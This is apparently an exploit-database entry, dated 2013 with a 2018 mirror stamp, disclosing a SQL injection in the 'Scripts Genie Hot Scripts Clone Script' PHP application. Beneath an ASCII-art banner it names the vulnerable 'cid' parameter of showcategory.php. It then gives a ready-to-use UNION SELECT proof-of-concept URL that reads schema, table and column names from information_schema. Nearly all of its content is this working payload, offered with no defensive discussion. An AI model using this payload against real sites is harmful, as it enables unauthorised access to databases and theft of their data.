Scripts Genie Hot Scripts Clone SQL Injection Vulnerability

2013-02-18T00:00:00
ID 1337DAY-ID-20391
Type zdt
Reporter Easy Laster
Modified 2013-02-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            -+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+             Security Flaw            +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+                         __     _     +
+ ___  ___  ___ _   _  /\ \ \___| |_   +
+/ __|/ _ \/ __| | | |/  \/ / _ \ __|  +
+\__ \  __/ (__| |_| / /\  /  __/ |_   +
+|___/\___|\___|\__,_\_\ \/ \___|\__|  +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-+
+Scripts Genie Hot Scripts Clone Script+
+  SQL Injection Vulnerability PoC     +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=+
+       Discovered by Easy Laster      +
+      Autor : Easy Laster             +
+       Date   :17.02.2013             +
+      Script:Scripts Genie            +
+        Hot Scripts Clone Script      +
+        scriptsgenie.com              +
+       Price  ::$1.75                 +
+      Language: PHP                   +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+              Vulnerability           +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+hutscripts/showcategory.php?cid=[SQLi]+
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+           Proof of Concept           +
+        Crawling the MYSQL Stack      +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
/hutscripts/showcategory.php?cid=21+uni
on+select+1,concat_ws(0x3a,table_schema
,table_name,column_name),3,4,5+from+inf
ormation_schema.columns+limit+180,1--+

#  0day.today [2018-04-02]  #